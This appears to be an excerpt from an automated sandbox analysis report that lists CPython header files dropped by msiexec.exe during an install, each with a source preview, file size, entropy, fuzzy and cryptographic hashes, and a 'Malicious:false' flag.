                                                                                                                                Preview:#ifndef Py_CPYTHON_SYSMODULE_H..# error "this header file must not be included directly"..#endif....PyAPI_FUNC(PyObject *) _PySys_GetAttr(PyThreadState *tstate,.. PyObject *name);....PyAPI_FUNC(size_t) _PySys_GetSizeOf(PyObject *);....typedef int(*Py_AuditHookFunction)(const char *, PyObject *, void *);....PyAPI_FUNC(int) PySys_Audit(.. const char *event,.. const char *argFormat,.. ...);..PyAPI_FUNC(int) PySys_AddAuditHook(Py_AuditHookFunction, void*);..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):460
                                                                                                                                Entropy (8bit):4.99833604415647
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:Bd2/HQxib2ERox0elhyLvu5lE02COWPdv:Uwxib+x0elhyLGE02ZWPdv
                                                                                                                                MD5:AEE42A8030D1AD6C1C51BA1B9D26966E
                                                                                                                                SHA1:C315296382339D2B5C05996A19B040EBA3F10417
                                                                                                                                SHA-256:0C8306BDD6F4D5ECE7DB4F798024F8B59527C314FABB12ADD093BECD41E9F687
                                                                                                                                SHA-512:816E8F902BD562D6EED69FEFF4B1DC90D34E95C8BD14DA0201D50D5A4FC3BC210A5B5925CE2F5E5DB7F033444789FD07F0C0A35C834F2B166426BFBF05367FA1
                                                                                                                                Malicious:false
                                                                                                                                Preview:#ifndef Py_CPYTHON_TRACEBACK_H..# error "this header file must not be included directly"..#endif....typedef struct _traceback PyTracebackObject;....struct _traceback {.. PyObject_HEAD.. PyTracebackObject *tb_next;.. PyFrameObject *tb_frame;.. int tb_lasti;.. int tb_lineno;..};....PyAPI_FUNC(int) _Py_DisplaySourceLine(PyObject *, PyObject *, int, int, int *, PyObject **);..PyAPI_FUNC(void) _PyTraceback_Add(const char *, const char *, int);..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1556
                                                                                                                                Entropy (8bit):5.307991400822136
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:plwxib+xpKtf4Ssh3XBEGeA08u+r5JZaAkYSx3hSp+J+yJ52zPAqJYSfJo1fG:XcgYpQlM5FJZDkYUbJ+yjEIqJYyJo1fG
                                                                                                                                MD5:DCD5C66D4865C384BA11DA21FDEC2DCB
                                                                                                                                SHA1:3B466ADA429AC603C15175422B4C7C29A0FDE4A9
                                                                                                                                SHA-256:1FFDE2B5DE8120FCCE3F53A18EF9F909AD2B10D8B9F6C09C504C12CAF104721C
                                                                                                                                SHA-512:4B0B6519EEBF3F3A817015A00D72F84047D26E276D3E68E22F96B7A1D6504F11DAFCD15F44F07DDE6750E30C851783F776F1F3779CD94C8E41FD31A54EEE0172
                                                                                                                                Malicious:false
                                                                                                                                Preview:#ifndef Py_CPYTHON_TUPLEOBJECT_H..# error "this header file must not be included directly"..#endif....typedef struct {.. PyObject_VAR_HEAD.. /* ob_item contains space for 'ob_size' elements... Items must normally not be NULL, except during construction when.. the tuple is not yet visible outside the function that builds it. */.. PyObject *ob_item[1];..} PyTupleObject;....PyAPI_FUNC(int) _PyTuple_Resize(PyObject **, Py_ssize_t);..PyAPI_FUNC(void) _PyTuple_MaybeUntrack(PyObject *);..../* Cast argument to PyTupleObject* type. */..#define _PyTuple_CAST(op) \.. (assert(PyTuple_Check(op)), _Py_CAST(PyTupleObject*, (op)))....// Macros and static inline functions, trading safety for speed....static inline Py_ssize_t PyTuple_GET_SIZE(PyObject *op) {.. PyTupleObject *tuple = _PyTuple_CAST(op);.. return Py_SIZE(tuple);..}..#if !defined(Py_LIMITED_API) || Py_LIMITED_API+0 < 0x030b0000..# define PyTuple_GET_SIZE(op) PyTuple_GET_SIZE(_PyObject_CAST(op))..#endif....#de
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):43063
                                                                                                                                Entropy (8bit):5.1289597156454665
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:768:/0A1esvwBsaIKHF6dsiCH2pPL15kpZdk5Uzo6:8A1eopPGs6
                                                                                                                                MD5:DA49F08F6B14E6C55588139B642F8BC6
                                                                                                                                SHA1:97E17E2A44097C1A2DB3616455113DFC9B6FECA9
                                                                                                                                SHA-256:EF0AB5B3066E835D4BBF8A0BC70290E0D11F7765D8A38E1D4DA2BCF94BF4B9AD
                                                                                                                                SHA-512:578E81858BE74CC3795509B3D2BC9343828AEEFE4916AB10C54000AAF055621574140041CF2732EB2465B65CF7192F995EEBCC0408335923791B62CACF71F33C
                                                                                                                                Malicious:false
                                                                                                                                Preview:#ifndef Py_CPYTHON_UNICODEOBJECT_H..# error "this header file must not be included directly"..#endif..../* Py_UNICODE was the native Unicode storage format (code unit) used by.. Python and represents a single Unicode element in the Unicode type... With PEP 393, Py_UNICODE is deprecated and replaced with a.. typedef to wchar_t. */..#define PY_UNICODE_TYPE wchar_t../* Py_DEPRECATED(3.3) */ typedef wchar_t Py_UNICODE;..../* --- Internal Unicode Operations ---------------------------------------- */....#ifndef USE_UNICODE_WCHAR_CACHE..# define USE_UNICODE_WCHAR_CACHE 1..#endif /* USE_UNICODE_WCHAR_CACHE */..../* Since splitting on whitespace is an important use case, and.. whitespace in most situations is solely ASCII whitespace, we.. optimize for the common case by using a quick look-up table.. _Py_ascii_whitespace (see below) with an inlined check..... */..#define Py_UNICODE_ISSPACE(ch) \.. ((Py_UCS4)(ch) < 128U ? _Py_ascii_whitespace[(ch)] : _PyUnicode_IsWhitespace(ch))
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):580
                                                                                                                                Entropy (8bit):5.016662830919364
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:BB/HQxib2E5nlBKFvaKXXTnl2eh8XXQ/KIBPlUcp:vwxibvBuaWhl8Q/K69xp
                                                                                                                                MD5:AD6D2FB48CA37718DA8A9A34428F84CC
                                                                                                                                SHA1:78C43EEE2FF5335A59ACDD0FE3C7E2DD4CCB5FC0
                                                                                                                                SHA-256:75C82E7DDA588753605D2C28E64A3AE1590A231A84DE0311C48A775F655D5FD5
                                                                                                                                SHA-512:E7D334D4E7A3CE35F4070F2051278EE0D3B5364A852B77F9D947F24A4374C53DAD0B91D2B4D9803FEB8F657E2FEAEF9C8FC9418CD1A1C83CE7FA93996DA8B082
                                                                                                                                Malicious:false
                                                                                                                                Preview:#ifndef Py_CPYTHON_WARNINGS_H..# error "this header file must not be included directly"..#endif....PyAPI_FUNC(int) PyErr_WarnExplicitObject(.. PyObject *category,.. PyObject *message,.. PyObject *filename,.. int lineno,.. PyObject *module,.. PyObject *registry);....PyAPI_FUNC(int) PyErr_WarnExplicitFormat(.. PyObject *category,.. const char *filename, int lineno,.. const char *module, PyObject *registry,.. const char *format, ...);....// DEPRECATED: Use PyErr_WarnEx() instead...#define PyErr_Warn(category, msg) PyErr_WarnEx(category, msg, 1)..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):2161
                                                                                                                                Entropy (8bit):4.970289810480353
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:gcgpsjf3htgu30YUqx9wdDYP7MYi3RAKaknYCShFL7fPxnBKilX:gcJx4Yj0dsPsakYHhFvfPxB/x
                                                                                                                                MD5:F24EEAC22A90BBC9129857A051A50A80
                                                                                                                                SHA1:22E87F6FF5216CF5274CD29B3524846E106A61E4
                                                                                                                                SHA-256:E0235345A212AE5B673B871DF88ED0135B3850872F0976486748EA26A2C76929
                                                                                                                                SHA-512:64271745CBADE9DADF66BA6DF34047E133C9784898E397B0B3AAA6CA7DC7423FA54276ACEC8B000044ADC4F76E88744CBEB7D7AF7F8DE1BDD9E6A5FCE1806A7D
                                                                                                                                Malicious:false
                                                                                                                                Preview:#ifndef Py_CPYTHON_WEAKREFOBJECT_H..# error "this header file must not be included directly"..#endif..../* PyWeakReference is the base struct for the Python ReferenceType, ProxyType,.. * and CallableProxyType... */..struct _PyWeakReference {.. PyObject_HEAD.... /* The object to which this is a weak reference, or Py_None if none... * Note that this is a stealth reference: wr_object's refcount is.. * not incremented to reflect this pointer... */.. PyObject *wr_object;.... /* A callable to invoke when wr_object dies, or NULL if none. */.. PyObject *wr_callback;.... /* A cache for wr_object's hash code. As usual for hashes, this is -1.. * if the hash code isn't known yet... */.. Py_hash_t hash;.... /* If wr_object is weakly referenced, wr_object has a doubly-linked NULL-.. * terminated list of weak references to it. These are the list pointers... * If wr_object goes away, wr_object is set to Py_None, and these pointers.. * have no
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):9902
                                                                                                                                Entropy (8bit):5.11458255132016
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:96:nSAPj/BvFx1QZU5f5kU+HnVflGD1XBWzwN9okQcp7owy+W+0vgOO:nnP9NrQZAfsHnAIv+W+qO
                                                                                                                                MD5:8AC6E53D5BBD440E7B74EA36CB4A3B2F
                                                                                                                                SHA1:D8B524347096280EED2ED900098C114DAC2EE891
                                                                                                                                SHA-256:91765FB0A05DDDAB3C267B326001C443FC11F9F28B99831463F03B5AC895E088
                                                                                                                                SHA-512:900A6EBCE6488AF05CDBA5BA687DB4225CAD25709B1432F47CF584495DDDCB97213251A18E0A3B40022F3F80025F2B9F1B71560DBD4ACBADC037CB8687FA1F9C
                                                                                                                                Malicious:false
                                                                                                                                Preview:/* datetime.h.. */..#ifndef Py_LIMITED_API..#ifndef DATETIME_H..#define DATETIME_H..#ifdef __cplusplus..extern "C" {..#endif..../* Fields are packed into successive bytes, each viewed as unsigned and.. * big-endian, unless otherwise noted:.. *.. * byte offset.. * 0 year 2 bytes, 1-9999.. * 2 month 1 byte, 1-12.. * 3 day 1 byte, 1-31.. * 4 hour 1 byte, 0-23.. * 5 minute 1 byte, 0-59.. * 6 second 1 byte, 0-59.. * 7 usecond 3 bytes, 0-999999.. * 10.. */..../* # of bytes for year, month, and day. */..#define _PyDateTime_DATE_DATASIZE 4..../* # of bytes for hour, minute, second, and usecond. */..#define _PyDateTime_TIME_DATASIZE 6..../* # of bytes for year, month, day, hour, minute, second, and usecond. */..#define _PyDateTime_DATETIME_DATASIZE 10......typedef struct..{.. PyObject_HEAD.. Py_hash_t hashcode; /* -1 when unknown */.. int days; /* -MAX_DELTA_DAYS
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1300
                                                                                                                                Entropy (8bit):5.183193610675022
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:U6erK5F5bJjmxJoQO1FZYhFKaytnaKUnA/KUnc5muniYndnYrCJ72cZ/3BD+:Z5BsovZYhFKaTKF/KICxV+
                                                                                                                                MD5:8DFECA40FE9B3AAFC63D559ADB44BECA
                                                                                                                                SHA1:355E1445EB7CE1EE260E8CD0A46543F08EBE6A9A
                                                                                                                                SHA-256:BF935C00158088C3A5AC3FE7D1BC940AE9CB5CFBD574B5758DFB1130AFE8380D
                                                                                                                                SHA-512:FF1CF3962769AE3C7F2B8E70CC7F98F89B34CFFDD088ABEE8CBC047810F530CA14B785431B6D8F42AFDA21A871FC262D4265D2CDE8E111679C467E6CDC1D2A84
                                                                                                                                Malicious:false
                                                                                                                                Preview:/* Descriptors */..#ifndef Py_DESCROBJECT_H..#define Py_DESCROBJECT_H..#ifdef __cplusplus..extern "C" {..#endif....typedef PyObject *(*getter)(PyObject *, void *);..typedef int (*setter)(PyObject *, PyObject *, void *);....struct PyGetSetDef {.. const char *name;.. getter get;.. setter set;.. const char *doc;.. void *closure;..};....PyAPI_DATA(PyTypeObject) PyClassMethodDescr_Type;..PyAPI_DATA(PyTypeObject) PyGetSetDescr_Type;..PyAPI_DATA(PyTypeObject) PyMemberDescr_Type;..PyAPI_DATA(PyTypeObject) PyMethodDescr_Type;..PyAPI_DATA(PyTypeObject) PyWrapperDescr_Type;..PyAPI_DATA(PyTypeObject) PyDictProxy_Type;..PyAPI_DATA(PyTypeObject) PyProperty_Type;....PyAPI_FUNC(PyObject *) PyDescr_NewMethod(PyTypeObject *, PyMethodDef *);..PyAPI_FUNC(PyObject *) PyDescr_NewClassMethod(PyTypeObject *, PyMethodDef *);..PyAPI_FUNC(PyObject *) PyDescr_NewMember(PyTypeObject *, PyMemberDef *);..PyAPI_FUNC(PyObject *) PyDescr_NewGetSet(PyTypeObject *, PyGetSetDef *);....PyAPI_FUNC(PyObject *)
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):3949
                                                                                                                                Entropy (8bit):5.189972927619561
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:gMsfuknK4T5scN2CrOHex8FAEneZA3xA5uRZJDA:gnFF9b4Crdx8XpqkZJDA
                                                                                                                                MD5:8DD548263491102842EF2983DA2C6C2C
                                                                                                                                SHA1:F8717341047F89301629F3153C4EF9FC20AB38AD
                                                                                                                                SHA-256:B932719F097E40E524BE43AA567E89B2896A302EB8AB73D42E30CAAF51DAD931
                                                                                                                                SHA-512:104004EA526CFFEC2284F02D05307969BCF0B501C55EFF141CAE23471FB9926611535B9EE2806D8DAD60524CFB33A07CC5F950C2ADB987AB5AD87248C665B022
                                                                                                                                Malicious:false
                                                                                                                                Preview:#ifndef Py_DICTOBJECT_H..#define Py_DICTOBJECT_H..#ifdef __cplusplus..extern "C" {..#endif..../* Dictionary object type -- mapping from hashable object to object */..../* The distribution includes a separate file, Objects/dictnotes.txt,.. describing explorations into dictionary design and optimization... It covers typical dictionary use patterns, the parameters for.. tuning dictionaries, and several ideas for possible optimizations...*/....PyAPI_DATA(PyTypeObject) PyDict_Type;....#define PyDict_Check(op) \.. PyType_FastSubclass(Py_TYPE(op), Py_TPFLAGS_DICT_SUBCLASS)..#define PyDict_CheckExact(op) Py_IS_TYPE(op, &PyDict_Type)....PyAPI_FUNC(PyObject *) PyDict_New(void);..PyAPI_FUNC(PyObject *) PyDict_GetItem(PyObject *mp, PyObject *key);..PyAPI_FUNC(PyObject *) PyDict_GetItemWithError(PyObject *mp, PyObject *key);..PyAPI_FUNC(int) PyDict_SetItem(PyObject *mp, PyObject *key, PyObject *item);..PyAPI_FUNC(int) PyDict_DelItem(PyObject *mp, PyObject *key);..PyAPI_FUNC(vo
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):22968
                                                                                                                                Entropy (8bit):5.103258806740658
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:jrsZqwzgPjrmk1Vay6g4WAQRodgImv9USD5p2TIv4F7Z3iyGdUbC/:jAzgPj6kjaSAQRodhmv9pn2TDF93iyG1
                                                                                                                                MD5:48DEC9A3E9EA326ABA0927F8ED7D8017
                                                                                                                                SHA1:93915F87B504B5AB3830E4908701CD817C570332
                                                                                                                                SHA-256:5B4ADBB589825BE2058422508E99BD664660E7240F53D1971C2EC181DA4A501C
                                                                                                                                SHA-512:935ADC5F8BC821F3C388A313AF9692FF4F0870678D6D15B17FA04A811BF2B921E9301F20E494D647B47FBA2BB04818EAA321EE9DF81AA28C7454F4635335E7B3
                                                                                                                                Malicious:false
                                                                                                                                Preview:/* Copyright (c) 2008-2009, Google Inc... * All rights reserved... *.. * Redistribution and use in source and binary forms, with or without.. * modification, are permitted provided that the following conditions are.. * met:.. *.. * * Redistributions of source code must retain the above copyright.. * notice, this list of conditions and the following disclaimer... * * Neither the name of Google Inc. nor the names of its.. * contributors may be used to endorse or promote products derived from.. * this software without specific prior written permission... *.. * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS.. * "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT.. * LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR.. * A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT.. * OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,.. * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT.
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):270
                                                                                                                                Entropy (8bit):5.124776919282634
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:YkLko+6P2Q0Pjo+6h8FOQI28AGRKmGjQ6QMtZb6TzJ581iHe7YJ581DFEvGHGjQc:BD2Q0u8Ad2xjQ6z3ueBhG5jQ6dKQ
                                                                                                                                MD5:EF325605B8543385361518B5851C081C
                                                                                                                                SHA1:E5547AAF812F76ADD841C4DD473EF6B87F9BF5D3
                                                                                                                                SHA-256:469C8A7BBCA8A67FD17BC728A1D6D4225C4C0566475774B5DEB655462F058659
                                                                                                                                SHA-512:A7A676339EA79E81D82B59A298DB0F9C3A2E304592828FD95903017F2613EF049AAA13B89C87A7ACEBE45A7B8B9F938E7A05802FC42CD75E40D1C025D99E2E9E
                                                                                                                                Malicious:false
                                                                                                                                Preview:#ifndef Py_ENUMOBJECT_H..#define Py_ENUMOBJECT_H..../* Enumerate Object */....#ifdef __cplusplus..extern "C" {..#endif....PyAPI_DATA(PyTypeObject) PyEnum_Type;..PyAPI_DATA(PyTypeObject) PyReversed_Type;....#ifdef __cplusplus..}..#endif....#endif /* !Py_ENUMOBJECT_H */..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1738
                                                                                                                                Entropy (8bit):4.647260787299449
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:UJYLLCAHrNiZVUUmcFyNaFkX1sdlFyt2tIdKA6ssjrC6SH/rCLcUk/:DbrQUiy6d1uKAOSHocZ/
                                                                                                                                MD5:C6B289E9FC4BBE8C9175B2366DD29CBD
                                                                                                                                SHA1:EAC22C12A471612E0D903B9B6A312B12F86EFA2F
                                                                                                                                SHA-256:2C5FD05296814AAB457F37EEA53A3141C855698778E10DDD923F6945A4F3A0EB
                                                                                                                                SHA-512:11251F9095F416D7CF59DBED39635C57E9F4F35C394E6C4D4FCCA9D338013F8A73D5E4EACE05BDDB5757375189552911C41D4506CF765ABAD0BF74BED644923C
                                                                                                                                Malicious:false
                                                                                                                                Preview:#ifndef Py_ERRCODE_H..#define Py_ERRCODE_H..#ifdef __cplusplus..extern "C" {..#endif....../* Error codes passed around between file input, tokenizer, parser and.. interpreter. This is necessary so we can turn them into Python.. exceptions at a higher level. Note that some errors have a.. slightly different meaning when passed from the tokenizer to the.. parser than when passed from the parser to the interpreter; e.g... the parser only returns E_EOF when it hits EOF immediately, and it.. never returns E_OK. */....#define E_OK 10 /* No error */..#define E_EOF 11 /* End Of File */..#define E_INTR 12 /* Interrupted */..#define E_TOKEN 13 /* Bad token */..#define E_SYNTAX 14 /* Syntax error */..#define E_NOMEM 15 /* Ran out of memory */..#define E_DONE 16 /* Parsing complete */..#define E_ERROR 17 /* Execution error */..#define E_TABSPACE 18 /* Inconsistent m
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1128
                                                                                                                                Entropy (8bit):5.094876858984147
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:5lfgGJbRIeXHWQkTPGI4qeR74nju2kQQL:nfgGqH+IaR8y3
                                                                                                                                MD5:F6865ECF062B1806548B92D04826D961
                                                                                                                                SHA1:52025452E85589044C24251CCEBFEBCC16AB2263
                                                                                                                                SHA-256:185C68E380C7AA72D677A88A9820C11150A58FA3C3A750498CFAC01F25FE05DC
                                                                                                                                SHA-512:80EA15E069F0480B209525464FA55F2B96F3623526CA5B9AC77E4B3230BBFAFB3E42E958A57942E5361BDE9EE4CC79632A4056B8B7C8762311342CB20E15C414
                                                                                                                                Malicious:false
                                                                                                                                Preview:#ifndef Py_EXPORTS_H..#define Py_EXPORTS_H....#if defined(_WIN32) || defined(__CYGWIN__).. #define Py_IMPORTED_SYMBOL __declspec(dllimport).. #define Py_EXPORTED_SYMBOL __declspec(dllexport).. #define Py_LOCAL_SYMBOL..#else../*.. * If we only ever used gcc >= 5, we could use __has_attribute(visibility).. * as a cross-platform way to determine if visibility is supported. However,.. * we may still need to support gcc >= 4, as some Ubuntu LTS and Centos versions.. * have 4 < gcc < 5... */.. #ifndef __has_attribute.. #define __has_attribute(x) 0 // Compatibility with non-clang compilers... #endif.. #if (defined(__GNUC__) && (__GNUC__ >= 4)) ||\.. (defined(__clang__) && __has_attribute(visibility)).. #define Py_IMPORTED_SYMBOL __attribute__ ((visibility ("default"))).. #define Py_EXPORTED_SYMBOL __attribute__ ((visibility ("default"))).. #define Py_LOCAL_SYMBOL __attribute__ ((visibility ("hidden"))).. #else.. #define Py_IMPORTE
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1619
                                                                                                                                Entropy (8bit):5.260931805516432
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:pyFYJ4vAQm3ujhFr7T7b/oMvz6sGTqEV/KIdiYCY/oujnjalj0UE:wFLzm3ujfwY6sGTqkzml2
                                                                                                                                MD5:7D0DFF4085E0C50DCF4005A45BBD31DA
                                                                                                                                SHA1:50CCA4BDD0AFFF1C07E355A32CDC73CC7EEEE017
                                                                                                                                SHA-256:6A00D05F0B620963D1AB8DCEF5D956E2A0FA7043A738EC57FD850F18D756041E
                                                                                                                                SHA-512:694BA99C97620FD80C2F0A3A406B4580CEE7118A7F2ACE67E930B8D368CD915D78032F71BF7E74679D38A3EB42852730D0FCB3C3E42F2994213DE049E71F8F70
                                                                                                                                Malicious:false
                                                                                                                                Preview:/* File object interface (what's left of it -- see io.py) */....#ifndef Py_FILEOBJECT_H..#define Py_FILEOBJECT_H..#ifdef __cplusplus..extern "C" {..#endif....#define PY_STDIOTEXTMODE "b"....PyAPI_FUNC(PyObject *) PyFile_FromFd(int, const char *, const char *, int,.. const char *, const char *,.. const char *, int);..PyAPI_FUNC(PyObject *) PyFile_GetLine(PyObject *, int);..PyAPI_FUNC(int) PyFile_WriteObject(PyObject *, PyObject *, int);..PyAPI_FUNC(int) PyFile_WriteString(const char *, PyObject *);..PyAPI_FUNC(int) PyObject_AsFileDescriptor(PyObject *);..../* The default encoding used by the platform file system APIs.. If non-NULL, this is different than the default encoding for strings..*/..PyAPI_DATA(const char *) Py_FileSystemDefaultEncoding;..#if !defined(Py_LIMITED_API) || Py_LIMITED_API+0 >= 0x03060000..PyAPI_DATA(const char *) Py_FileSystemDefaultEncodeErrors;..#endif..PyAPI_DATA(int) Py_HasFileSystemDefaul
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):533
                                                                                                                                Entropy (8bit):5.262910041141389
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:BAOfsmNELN8zlZNE0JqQerCJ7sotc7oFBLorrPD:VbCOPN7qauF0lyzD
                                                                                                                                MD5:467643A21BBDF939E59D7C53BA5821AB
                                                                                                                                SHA1:4BB4A5A7867DA4957EC577C08793E3F4E4A10BF7
                                                                                                                                SHA-256:B07EA9C8C3975A1FF9D289B8DDAAE2A3BDDA2D4B3AD28615950EDE52B325F591
                                                                                                                                SHA-512:CE7CF8DDB8ACBBE8B81B6197555343293C24B4AFCBDF62E54F74BB395438DF104104E958056550DDD5419C6F280FFFA6DAB4B744A4F748D0CCC32A0BEBE600E5
                                                                                                                                Malicious:false
                                                                                                                                Preview:#ifndef Py_FILEUTILS_H..#define Py_FILEUTILS_H..#ifdef __cplusplus..extern "C" {..#endif....#if !defined(Py_LIMITED_API) || Py_LIMITED_API+0 >= 0x03050000..PyAPI_FUNC(wchar_t *) Py_DecodeLocale(.. const char *arg,.. size_t *size);....PyAPI_FUNC(char*) Py_EncodeLocale(.. const wchar_t *text,.. size_t *error_pos);..#endif....#ifndef Py_LIMITED_API..# define Py_CPYTHON_FILEUTILS_H..# include "cpython/fileutils.h"..# undef Py_CPYTHON_FILEUTILS_H..#endif....#ifdef __cplusplus..}..#endif..#endif /* !Py_FILEUTILS_H */..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1584
                                                                                                                                Entropy (8bit):4.943437704332433
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:jdjzQVkZQ3RDC6O5XHPCPsOq1SuPGGm+twt:jROLW3PCPsT1SuPm+tC
                                                                                                                                MD5:CD63AAA6B9F53F0D38A4B5A9ABBDDC88
                                                                                                                                SHA1:E2D0CE55BC524DFC6B5D7BE75505AD7E8FA6D3C1
                                                                                                                                SHA-256:CCABC662E8CB2F52717B6D1631324D36278DBC9C30D109BAB884E84D6E1D1DE8
                                                                                                                                SHA-512:F58DD2F69EA57E71F5040C45D065AB7861EC636658B93EA441050627F9996B4D39BA3F0144885A69BF0DD50A228C180DF6A8D648C61ADF1ED3AFDB1F9B5ECA38
                                                                                                                                Malicious:false
                                                                                                                                Preview:../* Float object interface */..../*..PyFloatObject represents a (double precision) floating point number...*/....#ifndef Py_FLOATOBJECT_H..#define Py_FLOATOBJECT_H..#ifdef __cplusplus..extern "C" {..#endif....PyAPI_DATA(PyTypeObject) PyFloat_Type;....#define PyFloat_Check(op) PyObject_TypeCheck(op, &PyFloat_Type)..#define PyFloat_CheckExact(op) Py_IS_TYPE(op, &PyFloat_Type)....#define Py_RETURN_NAN return PyFloat_FromDouble(Py_NAN)....#define Py_RETURN_INF(sign) \.. do { \.. if (copysign(1., sign) == 1.) { \.. return PyFloat_FromDouble(Py_HUGE_VAL); \.. } \.. else { \.. return PyFloat_FromDouble(-Py_HUGE_VAL); \.. } \.. } while(0)....PyAPI_FUNC(double) PyFloat_GetMax(void);..PyAPI_FUNC(double) PyFloat_GetMin(void);..PyAPI_FUNC
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):356
                                                                                                                                Entropy (8bit):5.166839299334996
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:6:UbSHKoqrIxv4mA2Q0Phv4mAmjQ6zMAserCJs0fSq4mAwAkV5Kzy3Bpq4mAVjQ6dO:UbSmrRcaqMAserCJ7G/cp3BFZ2l
                                                                                                                                MD5:EBC4DAF5237CECED6E0692668597F2CB
                                                                                                                                SHA1:C651EA83ABCB608FB363D21D408239880394EA7D
                                                                                                                                SHA-256:52E7B1F56DA8F7E78A2567FE9AF98C6F97250F0BBB81951DF4215C8BD1C468F7
                                                                                                                                SHA-512:3A1D4F1CA1C69BEBCFEB7DC9F3E0BB71DB225184AEAB9639DC5BD5BE2F8753B3619F82109B3935E274833DA6C80A87F66A6DDD7CB1E16BB1368A92D8AD427CEE
                                                                                                                                Malicious:false
                                                                                                                                Preview:/* Frame object interface */....#ifndef Py_FRAMEOBJECT_H..#define Py_FRAMEOBJECT_H..#ifdef __cplusplus..extern "C" {..#endif....#include "pyframe.h"....#ifndef Py_LIMITED_API..# define Py_CPYTHON_FRAMEOBJECT_H..# include "cpython/frameobject.h"..# undef Py_CPYTHON_FRAMEOBJECT_H..#endif....#ifdef __cplusplus..}..#endif..#endif /* !Py_FRAMEOBJECT_H */..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):348
                                                                                                                                Entropy (8bit):5.354149111571425
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:6:j7eE41HOQFn3v1rx2Q0PimjQ6zheWENrF+i5jQ6dne:j7U1Hpv1rgHVhnEqge
                                                                                                                                MD5:8F84875A052BF2CC69C8695AB9CE8BC0
                                                                                                                                SHA1:841CA5B940D9B7E27B825F1E9600D4F778C658C5
                                                                                                                                SHA-256:3EBD563F70F3D317558774E74916AF1C294852FD943E041A79DC46C8FBCC458E
                                                                                                                                SHA-512:3571A31790779EB12BDFADE31CEC79D6299336041E483D87DED81000CE1E56451B495199B61F48B3F4856C1433CE5FDA21BD15BF83E8A78431CB541C707D5B5D
                                                                                                                                Malicious:false
